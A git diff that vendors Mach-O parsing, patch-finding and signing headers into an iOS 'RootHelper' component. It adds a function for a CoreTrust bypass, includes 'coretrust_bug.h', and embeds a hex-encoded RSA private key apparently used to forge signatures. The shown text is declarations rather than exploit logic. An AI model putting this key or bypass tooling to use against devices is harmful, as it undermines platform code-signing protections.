int update_load_commands_for_coretrust_bypass(MachO *macho, CS_SuperBlob *superblob, uint64_t originalCodeSignatureSize, uint64_t originalMachOSize);
#endif // MACHO_LOAD_COMMAND_H

60
RootHelper/external/include/choma/MemoryStream.h vendored Normal file
View File

@ -0,0 +1,60 @@
#ifndef MEMORY_STREAM_H
#define MEMORY_STREAM_H
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <stdbool.h>
#define MEMORY_STREAM_FLAG_OWNS_DATA (1 << 0)
#define MEMORY_STREAM_FLAG_MUTABLE (1 << 1)
#define MEMORY_STREAM_FLAG_AUTO_EXPAND (1 << 2)
#define MEMORY_STREAM_SIZE_INVALID (size_t)-1
// A generic memory IO interface that is used throughout this project
// Can be backed by anything, just the functions have to be implemented
typedef struct s_MemoryStream {
void *context;
uint32_t flags;
int (*read)(struct s_MemoryStream *stream, uint64_t offset, size_t size, void *outBuf);
int (*write)(struct s_MemoryStream *stream, uint64_t offset, size_t size, const void *inBuf);
int (*getSize)(struct s_MemoryStream *stream, size_t *sizeOut);
uint8_t *(*getRawPtr)(struct s_MemoryStream *stream);
int (*trim)(struct s_MemoryStream *stream, size_t trimAtStart, size_t trimAtEnd);
int (*expand)(struct s_MemoryStream *stream, size_t expandAtStart, size_t expandAtEnd);
struct s_MemoryStream *(*hardclone)(struct s_MemoryStream *stream);
struct s_MemoryStream *(*softclone)(struct s_MemoryStream *stream);
void (*free)(struct s_MemoryStream *stream);
} MemoryStream;
int memory_stream_read(MemoryStream *stream, uint64_t offset, size_t size, void *outBuf);
int memory_stream_write(MemoryStream *stream, uint64_t offset, size_t size, const void *inBuf);
int memory_stream_insert(MemoryStream *stream, uint64_t offset, size_t size, const void *inBuf);
int memory_stream_delete(MemoryStream *stream, uint64_t offset, size_t size);
int memory_stream_read_string(MemoryStream *stream, uint64_t offset, char **outString);
int memory_stream_write_string(MemoryStream *stream, uint64_t offset, const char *string);
size_t memory_stream_get_size(MemoryStream *stream);
uint8_t *memory_stream_get_raw_pointer(MemoryStream *stream);
uint32_t memory_stream_get_flags(MemoryStream *stream);
MemoryStream *memory_stream_softclone(MemoryStream *stream);
MemoryStream *memory_stream_hardclone(MemoryStream *stream);
int memory_stream_trim(MemoryStream *stream, size_t trimAtStart, size_t trimAtEnd);
int memory_stream_expand(MemoryStream *stream, size_t expandAtStart, size_t expandAtEnd);
void memory_stream_free(MemoryStream *stream);
int memory_stream_copy_data(MemoryStream *originStream, uint64_t originOffset, MemoryStream *targetStream, uint64_t targetOffset, size_t size);
int memory_stream_find_memory(MemoryStream *stream, uint64_t searchOffset, size_t searchSize, void *bytes, void *mask, size_t nbytes, uint16_t alignment, uint64_t *foundOffsetOut);
#endif // MEMORY_STREAM_H

44
RootHelper/external/include/choma/PatchFinder.h vendored Normal file
View File

@ -0,0 +1,44 @@
#include <stdint.h>
#include "MachO.h"
#define METRIC_TYPE_PATTERN 1
#define METRIC_TYPE_STRING_XREF 2
#define METRIC_TYPE_FUNCTION_XREF 3
typedef struct PFSection {
uint64_t fileoff;
uint64_t vmaddr;
uint64_t size;
uint8_t *cache;
bool ownsCache;
} PFSection;
PFSection *macho_patchfinder_create_section(MachO *macho, const char *filesetEntryId, const char *segName, const char *sectName);
int macho_patchfinder_cache_section(PFSection *section, MachO *fromMacho);
void macho_patchfinder_section_free(PFSection *section);
typedef struct MetricShared {
uint32_t type;
PFSection *section;
} MetricShared;
typedef enum {
BYTE_PATTERN_ALIGN_8_BIT,
BYTE_PATTERN_ALIGN_16_BIT,
BYTE_PATTERN_ALIGN_32_BIT,
BYTE_PATTERN_ALIGN_64_BIT,
} BytePatternAlignment;
typedef struct BytePatternMetric {
MetricShared shared;
void *bytes;
void *mask;
size_t nbytes;
BytePatternAlignment alignment;
} BytePatternMetric;
BytePatternMetric *macho_patchfinder_create_byte_pattern_metric(PFSection *section, void *bytes, void *mask, size_t nbytes, BytePatternAlignment alignment);
void macho_patchfinder_run_metric(MachO *macho, void *metric, void (^matchBlock)(uint64_t vmaddr, bool *stop));

145
RootHelper/external/include/choma/PrivateKey.h vendored Normal file
View File

@ -0,0 +1,145 @@
unsigned char ca_key[] = {
0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x42, 0x45, 0x47, 0x49, 0x4e, 0x20, 0x50,
0x52, 0x49, 0x56, 0x41, 0x54, 0x45, 0x20, 0x4b, 0x45, 0x59, 0x2d, 0x2d,
0x2d, 0x2d, 0x2d, 0x0a, 0x4d, 0x49, 0x49, 0x45, 0x76, 0x51, 0x49, 0x42,
0x41, 0x44, 0x41, 0x4e, 0x42, 0x67, 0x6b, 0x71, 0x68, 0x6b, 0x69, 0x47,
0x39, 0x77, 0x30, 0x42, 0x41, 0x51, 0x45, 0x46, 0x41, 0x41, 0x53, 0x43,
0x42, 0x4b, 0x63, 0x77, 0x67, 0x67, 0x53, 0x6a, 0x41, 0x67, 0x45, 0x41,
0x41, 0x6f, 0x49, 0x42, 0x41, 0x51, 0x43, 0x78, 0x72, 0x46, 0x54, 0x32,
0x5a, 0x2f, 0x5a, 0x31, 0x47, 0x76, 0x32, 0x55, 0x0a, 0x43, 0x58, 0x53,
0x2f, 0x62, 0x61, 0x61, 0x6c, 0x57, 0x63, 0x52, 0x62, 0x4d, 0x43, 0x39,
0x69, 0x49, 0x62, 0x4b, 0x6a, 0x7a, 0x51, 0x7a, 0x67, 0x41, 0x72, 0x70,
0x67, 0x55, 0x2b, 0x56, 0x30, 0x42, 0x64, 0x58, 0x30, 0x48, 0x32, 0x48,
0x6e, 0x56, 0x52, 0x61, 0x45, 0x33, 0x65, 0x7a, 0x4c, 0x7a, 0x72, 0x70,
0x59, 0x4c, 0x77, 0x65, 0x6e, 0x31, 0x79, 0x66, 0x39, 0x5a, 0x4f, 0x71,
0x73, 0x0a, 0x77, 0x2b, 0x65, 0x67, 0x59, 0x34, 0x5a, 0x54, 0x50, 0x74,
0x77, 0x50, 0x39, 0x4d, 0x6d, 0x70, 0x6c, 0x4c, 0x43, 0x75, 0x6f, 0x59,
0x41, 0x69, 0x6f, 0x6c, 0x72, 0x69, 0x77, 0x31, 0x32, 0x63, 0x70, 0x6b,
0x44, 0x6c, 0x62, 0x70, 0x55, 0x4a, 0x61, 0x68, 0x38, 0x59, 0x31, 0x56,
0x67, 0x45, 0x37, 0x6a, 0x4a, 0x47, 0x64, 0x61, 0x5a, 0x76, 0x48, 0x48,
0x4f, 0x37, 0x71, 0x44, 0x64, 0x50, 0x0a, 0x38, 0x48, 0x54, 0x50, 0x46,
0x65, 0x36, 0x48, 0x71, 0x50, 0x75, 0x43, 0x37, 0x5a, 0x6a, 0x50, 0x39,
0x4e, 0x6e, 0x45, 0x64, 0x50, 0x56, 0x4c, 0x48, 0x30, 0x4b, 0x6d, 0x6c,
0x2f, 0x54, 0x64, 0x49, 0x71, 0x34, 0x61, 0x71, 0x34, 0x30, 0x73, 0x4f,
0x78, 0x75, 0x32, 0x56, 0x36, 0x72, 0x78, 0x4c, 0x68, 0x7a, 0x44, 0x72,
0x52, 0x56, 0x76, 0x35, 0x4b, 0x43, 0x7a, 0x4c, 0x43, 0x44, 0x4c, 0x0a,
0x47, 0x64, 0x36, 0x51, 0x72, 0x6c, 0x4f, 0x68, 0x51, 0x33, 0x77, 0x69,
0x68, 0x79, 0x2b, 0x54, 0x2b, 0x69, 0x4d, 0x68, 0x4a, 0x75, 0x76, 0x54,
0x41, 0x46, 0x51, 0x6b, 0x72, 0x69, 0x66, 0x78, 0x33, 0x34, 0x67, 0x50,
0x64, 0x61, 0x6a, 0x68, 0x41, 0x6b, 0x49, 0x55, 0x56, 0x36, 0x49, 0x59,
0x54, 0x36, 0x48, 0x54, 0x33, 0x4a, 0x47, 0x64, 0x57, 0x71, 0x68, 0x39,
0x53, 0x71, 0x32, 0x44, 0x0a, 0x54, 0x73, 0x79, 0x75, 0x72, 0x36, 0x6d,
0x5a, 0x72, 0x75, 0x33, 0x73, 0x32, 0x70, 0x32, 0x78, 0x2b, 0x31, 0x65,
0x79, 0x57, 0x63, 0x63, 0x67, 0x41, 0x39, 0x34, 0x57, 0x58, 0x2f, 0x41,
0x57, 0x38, 0x72, 0x37, 0x56, 0x36, 0x47, 0x51, 0x4e, 0x4b, 0x78, 0x75,
0x61, 0x38, 0x6f, 0x39, 0x75, 0x74, 0x69, 0x51, 0x4c, 0x30, 0x78, 0x79,
0x56, 0x37, 0x79, 0x74, 0x2f, 0x30, 0x72, 0x69, 0x42, 0x0a, 0x67, 0x51,
0x64, 0x57, 0x71, 0x77, 0x65, 0x35, 0x41, 0x67, 0x4d, 0x42, 0x41, 0x41,
0x45, 0x43, 0x67, 0x67, 0x45, 0x41, 0x42, 0x64, 0x55, 0x78, 0x2f, 0x74,
0x72, 0x66, 0x34, 0x4f, 0x31, 0x50, 0x61, 0x4e, 0x59, 0x38, 0x6f, 0x6e,
0x49, 0x76, 0x6c, 0x39, 0x73, 0x51, 0x45, 0x71, 0x78, 0x4d, 0x79, 0x65,
0x78, 0x77, 0x53, 0x47, 0x64, 0x5a, 0x5a, 0x6c, 0x74, 0x41, 0x6b, 0x68,
0x76, 0x2b, 0x0a, 0x2b, 0x75, 0x57, 0x63, 0x4a, 0x67, 0x55, 0x48, 0x75,
0x6b, 0x66, 0x31, 0x55, 0x73, 0x78, 0x55, 0x55, 0x30, 0x61, 0x49, 0x6f,
0x49, 0x39, 0x2b, 0x73, 0x56, 0x68, 0x6a, 0x5a, 0x44, 0x4b, 0x31, 0x62,
0x35, 0x47, 0x49, 0x33, 0x35, 0x2b, 0x55, 0x7a, 0x39, 0x50, 0x4f, 0x39,
0x71, 0x6b, 0x6a, 0x47, 0x37, 0x47, 0x5a, 0x63, 0x55, 0x6f, 0x31, 0x41,
0x69, 0x34, 0x52, 0x54, 0x4d, 0x4e, 0x38, 0x0a, 0x4a, 0x63, 0x48, 0x68,
0x66, 0x49, 0x61, 0x36, 0x56, 0x74, 0x4a, 0x49, 0x6a, 0x68, 0x43, 0x6d,
0x38, 0x4a, 0x5a, 0x2f, 0x53, 0x51, 0x66, 0x67, 0x76, 0x47, 0x49, 0x54,
0x50, 0x4a, 0x52, 0x6a, 0x71, 0x48, 0x69, 0x73, 0x35, 0x51, 0x57, 0x44,
0x7a, 0x4b, 0x6c, 0x55, 0x42, 0x48, 0x4c, 0x58, 0x59, 0x76, 0x42, 0x58,
0x57, 0x39, 0x63, 0x35, 0x48, 0x45, 0x75, 0x38, 0x37, 0x4f, 0x6f, 0x66,
0x0a, 0x48, 0x79, 0x56, 0x6b, 0x52, 0x43, 0x36, 0x66, 0x39, 0x45, 0x37,
0x38, 0x75, 0x4d, 0x69, 0x51, 0x4c, 0x51, 0x6b, 0x76, 0x67, 0x45, 0x49,
0x74, 0x52, 0x36, 0x67, 0x30, 0x73, 0x6e, 0x53, 0x37, 0x36, 0x44, 0x71,
0x47, 0x6c, 0x78, 0x75, 0x2f, 0x47, 0x52, 0x42, 0x47, 0x50, 0x54, 0x54,
0x44, 0x45, 0x51, 0x33, 0x4e, 0x59, 0x39, 0x4b, 0x62, 0x70, 0x4f, 0x66,
0x30, 0x33, 0x36, 0x67, 0x58, 0x0a, 0x62, 0x66, 0x7a, 0x74, 0x66, 0x63,
0x67, 0x54, 0x2b, 0x6d, 0x35, 0x50, 0x41, 0x54, 0x4c, 0x39, 0x38, 0x6c,
0x6f, 0x58, 0x4e, 0x67, 0x4f, 0x34, 0x69, 0x4b, 0x76, 0x71, 0x47, 0x79,
0x4b, 0x77, 0x39, 0x46, 0x53, 0x4f, 0x44, 0x31, 0x53, 0x75, 0x48, 0x72,
0x56, 0x49, 0x6e, 0x7a, 0x49, 0x36, 0x59, 0x63, 0x37, 0x5a, 0x68, 0x4d,
0x64, 0x2f, 0x52, 0x74, 0x4f, 0x38, 0x37, 0x79, 0x45, 0x78, 0x0a, 0x2b,
0x48, 0x68, 0x6a, 0x67, 0x66, 0x7a, 0x74, 0x6b, 0x4d, 0x39, 0x62, 0x41,
0x30, 0x58, 0x4a, 0x5a, 0x43, 0x7a, 0x46, 0x34, 0x54, 0x41, 0x71, 0x6a,
0x55, 0x51, 0x31, 0x6e, 0x4a, 0x61, 0x33, 0x33, 0x59, 0x31, 0x39, 0x55,
0x38, 0x38, 0x41, 0x77, 0x51, 0x4b, 0x42, 0x67, 0x51, 0x44, 0x6e, 0x75,
0x37, 0x48, 0x73, 0x58, 0x37, 0x50, 0x64, 0x75, 0x2b, 0x4e, 0x33, 0x4d,
0x71, 0x46, 0x65, 0x0a, 0x75, 0x6c, 0x62, 0x58, 0x44, 0x58, 0x65, 0x34,
0x64, 0x55, 0x55, 0x67, 0x6c, 0x33, 0x64, 0x43, 0x53, 0x58, 0x58, 0x74,
0x4e, 0x71, 0x6b, 0x57, 0x66, 0x7a, 0x6e, 0x54, 0x6c, 0x62, 0x31, 0x74,
0x79, 0x52, 0x2b, 0x62, 0x55, 0x6b, 0x51, 0x49, 0x34, 0x6d, 0x5a, 0x51,
0x77, 0x67, 0x6b, 0x67, 0x52, 0x4b, 0x64, 0x41, 0x31, 0x65, 0x59, 0x52,
0x53, 0x5a, 0x47, 0x4b, 0x4d, 0x65, 0x75, 0x74, 0x0a, 0x77, 0x6f, 0x56,
0x62, 0x62, 0x64, 0x42, 0x45, 0x4e, 0x69, 0x77, 0x69, 0x39, 0x32, 0x52,
0x38, 0x67, 0x71, 0x65, 0x78, 0x32, 0x48, 0x52, 0x56, 0x4b, 0x52, 0x6f,
0x36, 0x53, 0x66, 0x75, 0x4c, 0x49, 0x46, 0x59, 0x4f, 0x6c, 0x35, 0x4f,
0x58, 0x2f, 0x61, 0x51, 0x4a, 0x55, 0x72, 0x34, 0x49, 0x45, 0x46, 0x6d,
0x69, 0x51, 0x2f, 0x30, 0x59, 0x32, 0x2b, 0x39, 0x47, 0x36, 0x36, 0x71,
0x79, 0x0a, 0x77, 0x46, 0x63, 0x34, 0x6f, 0x54, 0x39, 0x64, 0x2b, 0x65,
0x63, 0x50, 0x4c, 0x67, 0x43, 0x46, 0x54, 0x51, 0x36, 0x64, 0x79, 0x46,
0x59, 0x2f, 0x6b, 0x51, 0x4b, 0x42, 0x67, 0x51, 0x44, 0x45, 0x52, 0x32,
0x56, 0x49, 0x38, 0x7a, 0x4f, 0x6a, 0x62, 0x64, 0x6e, 0x41, 0x52, 0x41,
0x55, 0x77, 0x31, 0x65, 0x49, 0x59, 0x67, 0x4f, 0x47, 0x58, 0x69, 0x6b,
0x30, 0x65, 0x6c, 0x45, 0x37, 0x4c, 0x0a, 0x65, 0x52, 0x54, 0x53, 0x77,
0x59, 0x37, 0x78, 0x41, 0x51, 0x69, 0x36, 0x34, 0x46, 0x45, 0x53, 0x62,
0x59, 0x59, 0x73, 0x38, 0x6d, 0x64, 0x78, 0x45, 0x56, 0x37, 0x58, 0x38,
0x52, 0x4e, 0x77, 0x66, 0x70, 0x67, 0x51, 0x70, 0x50, 0x39, 0x6f, 0x70,
0x6e, 0x55, 0x2f, 0x57, 0x5a, 0x5a, 0x62, 0x47, 0x55, 0x66, 0x71, 0x34,
0x71, 0x4b, 0x69, 0x36, 0x47, 0x68, 0x51, 0x37, 0x4d, 0x6d, 0x51, 0x0a,
0x66, 0x4b, 0x4c, 0x47, 0x58, 0x71, 0x35, 0x57, 0x48, 0x6d, 0x36, 0x57,
0x4d, 0x48, 0x76, 0x45, 0x7a, 0x6f, 0x6f, 0x4f, 0x35, 0x35, 0x75, 0x6a,
0x77, 0x78, 0x2b, 0x71, 0x69, 0x69, 0x56, 0x2b, 0x5a, 0x38, 0x52, 0x38,
0x49, 0x59, 0x73, 0x30, 0x6e, 0x62, 0x4d, 0x54, 0x6e, 0x51, 0x70, 0x45,
0x55, 0x72, 0x73, 0x2f, 0x4d, 0x41, 0x65, 0x36, 0x5a, 0x4c, 0x73, 0x7a,
0x50, 0x36, 0x4c, 0x6f, 0x0a, 0x67, 0x69, 0x6d, 0x62, 0x55, 0x51, 0x4f,
0x42, 0x71, 0x51, 0x4b, 0x42, 0x67, 0x51, 0x43, 0x68, 0x78, 0x31, 0x61,
0x53, 0x6c, 0x38, 0x6d, 0x68, 0x58, 0x6a, 0x2b, 0x53, 0x41, 0x73, 0x58,
0x48, 0x74, 0x54, 0x31, 0x56, 0x43, 0x33, 0x44, 0x75, 0x56, 0x4f, 0x68,
0x36, 0x74, 0x57, 0x4f, 0x72, 0x34, 0x6b, 0x38, 0x79, 0x32, 0x54, 0x73,
0x34, 0x6d, 0x6e, 0x2b, 0x4c, 0x61, 0x48, 0x6d, 0x44, 0x0a, 0x77, 0x4b,
0x71, 0x52, 0x4b, 0x2b, 0x43, 0x56, 0x64, 0x30, 0x46, 0x49, 0x31, 0x66,
0x32, 0x37, 0x43, 0x6c, 0x4c, 0x64, 0x6e, 0x37, 0x62, 0x72, 0x6b, 0x4c,
0x6e, 0x4c, 0x69, 0x63, 0x68, 0x6f, 0x57, 0x57, 0x6e, 0x79, 0x68, 0x33,
0x71, 0x6a, 0x64, 0x46, 0x4a, 0x68, 0x34, 0x75, 0x62, 0x44, 0x53, 0x67,
0x2b, 0x36, 0x79, 0x45, 0x75, 0x47, 0x2f, 0x4a, 0x66, 0x7a, 0x34, 0x35,
0x78, 0x35, 0x0a, 0x35, 0x34, 0x78, 0x4d, 0x79, 0x61, 0x4e, 0x66, 0x73,
0x39, 0x4b, 0x6d, 0x4d, 0x35, 0x36, 0x35, 0x55, 0x48, 0x6a, 0x54, 0x49,
0x4c, 0x58, 0x38, 0x65, 0x65, 0x62, 0x56, 0x55, 0x30, 0x65, 0x72, 0x58,
0x54, 0x35, 0x48, 0x4b, 0x63, 0x4e, 0x73, 0x58, 0x7a, 0x2f, 0x68, 0x53,
0x42, 0x4e, 0x53, 0x2f, 0x4a, 0x58, 0x63, 0x72, 0x33, 0x55, 0x50, 0x45,
0x51, 0x4b, 0x42, 0x67, 0x44, 0x6d, 0x30, 0x0a, 0x30, 0x2b, 0x35, 0x79,
0x73, 0x6b, 0x66, 0x6d, 0x55, 0x42, 0x4c, 0x61, 0x37, 0x4c, 0x76, 0x43,
0x35, 0x6b, 0x70, 0x56, 0x2b, 0x66, 0x31, 0x58, 0x78, 0x2f, 0x79, 0x70,
0x6c, 0x64, 0x44, 0x30, 0x74, 0x45, 0x36, 0x53, 0x59, 0x62, 0x67, 0x78,
0x6d, 0x61, 0x4e, 0x33, 0x74, 0x39, 0x34, 0x33, 0x48, 0x53, 0x2b, 0x78,
0x78, 0x50, 0x2f, 0x56, 0x48, 0x35, 0x46, 0x56, 0x61, 0x32, 0x57, 0x7a,
0x0a, 0x6b, 0x6e, 0x6d, 0x79, 0x53, 0x50, 0x55, 0x33, 0x6d, 0x31, 0x6b,
0x59, 0x75, 0x62, 0x2f, 0x6d, 0x32, 0x75, 0x49, 0x50, 0x35, 0x38, 0x6b,
0x46, 0x6b, 0x30, 0x58, 0x58, 0x6d, 0x42, 0x74, 0x47, 0x79, 0x59, 0x53,
0x51, 0x36, 0x61, 0x69, 0x67, 0x49, 0x64, 0x73, 0x2b, 0x50, 0x65, 0x56,
0x4b, 0x35, 0x41, 0x51, 0x6c, 0x79, 0x2f, 0x69, 0x46, 0x73, 0x5a, 0x57,
0x75, 0x4c, 0x2f, 0x2f, 0x4e, 0x0a, 0x2b, 0x6c, 0x4b, 0x55, 0x65, 0x68,
0x7a, 0x71, 0x45, 0x48, 0x41, 0x2f, 0x78, 0x33, 0x6a, 0x32, 0x36, 0x64,
0x35, 0x56, 0x2f, 0x4b, 0x2b, 0x73, 0x56, 0x65, 0x31, 0x6e, 0x56, 0x44,
0x6f, 0x50, 0x71, 0x72, 0x50, 0x6a, 0x53, 0x61, 0x69, 0x68, 0x41, 0x6f,
0x47, 0x41, 0x46, 0x6e, 0x47, 0x6c, 0x6f, 0x68, 0x45, 0x53, 0x54, 0x35,
0x36, 0x54, 0x6f, 0x44, 0x35, 0x74, 0x4d, 0x34, 0x73, 0x77, 0x0a, 0x30,
0x4e, 0x5a, 0x73, 0x49, 0x4c, 0x35, 0x35, 0x4f, 0x68, 0x58, 0x6e, 0x75,
0x69, 0x50, 0x32, 0x69, 0x65, 0x78, 0x33, 0x47, 0x65, 0x78, 0x2f, 0x4e,
0x7a, 0x61, 0x48, 0x49, 0x42, 0x4c, 0x76, 0x33, 0x42, 0x55, 0x30, 0x77,
0x35, 0x4d, 0x50, 0x71, 0x4f, 0x49, 0x65, 0x44, 0x37, 0x31, 0x56, 0x6d,
0x6b, 0x49, 0x77, 0x6b, 0x2b, 0x2b, 0x68, 0x76, 0x44, 0x57, 0x57, 0x2b,
0x35, 0x56, 0x4a, 0x0a, 0x49, 0x50, 0x74, 0x75, 0x6f, 0x51, 0x34, 0x6e,
0x69, 0x30, 0x66, 0x61, 0x35, 0x62, 0x63, 0x6a, 0x32, 0x6d, 0x35, 0x66,
0x78, 0x66, 0x6a, 0x48, 0x37, 0x4b, 0x52, 0x5a, 0x63, 0x52, 0x35, 0x68,
0x2f, 0x61, 0x73, 0x66, 0x31, 0x72, 0x54, 0x33, 0x66, 0x73, 0x4b, 0x48,
0x61, 0x48, 0x37, 0x61, 0x71, 0x6a, 0x53, 0x6b, 0x79, 0x36, 0x30, 0x50,
0x72, 0x47, 0x46, 0x77, 0x68, 0x4a, 0x2b, 0x46, 0x0a, 0x47, 0x67, 0x4c,
0x37, 0x41, 0x54, 0x62, 0x4c, 0x48, 0x70, 0x53, 0x74, 0x6c, 0x67, 0x6b,
0x77, 0x4e, 0x70, 0x69, 0x59, 0x6d, 0x31, 0x67, 0x3d, 0x0a, 0x2d, 0x2d,
0x2d, 0x2d, 0x2d, 0x45, 0x4e, 0x44, 0x20, 0x50, 0x52, 0x49, 0x56, 0x41,
0x54, 0x45, 0x20, 0x4b, 0x45, 0x59, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x0a
};
unsigned int ca_key_len = 1704;

16
RootHelper/external/include/choma/SignOSSL.h vendored Normal file
View File

@ -0,0 +1,16 @@
#ifndef SIGN_OSSL_H
#define SIGN_OSSL_H
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <openssl/pem.h>
#include <openssl/rsa.h>
#include <openssl/sha.h>
#include <openssl/err.h>
unsigned char *signWithRSA(unsigned char *inputData, size_t inputDataLength, size_t *outputDataLength);
#endif // SIGN_OSSL_H
// 0xA422

12
RootHelper/external/include/choma/Signing.h vendored Normal file
View File

@ -0,0 +1,12 @@
#ifndef SIGNING_H
#define SIGNING_H
#include <stdio.h>
#include <stdlib.h>
#include <CommonCrypto/CommonCrypto.h>
#include <Security/SecKey.h>
#include <Security/Security.h>
// int signWithRSA(const char *certificateFile, const char *inputFile, const char *outputFile);
#endif // SIGNING_H

6
RootHelper/external/include/choma/Util.h vendored Normal file
View File

@ -0,0 +1,6 @@
#include <stdint.h>
#include <stdlib.h>
uint64_t align_to_size(int size, int alignment);
int count_digits(int64_t num);
void print_hash(uint8_t *hash, size_t size);

BIN
RootHelper/external/lib/libchoma.a vendored Normal file
View File

Binary file not shown.

BIN
RootHelper/external/lib/libcrypto.a vendored Normal file
View File

Binary file not shown.

2
RootHelper/main.m
View File

@ -10,6 +10,8 @@
#import <sys/utsname.h> #import <sys/utsname.h>
#import <mach-o/loader.h> #import <mach-o/loader.h>
#import <mach-o/fat.h> #import <mach-o/fat.h>
#import "adhoc.h"
#import "coretrust_bug.h"
#import <SpringBoardServices/SpringBoardServices.h> #import <SpringBoardServices/SpringBoardServices.h>
#import <Security/Security.h> #import <Security/Security.h>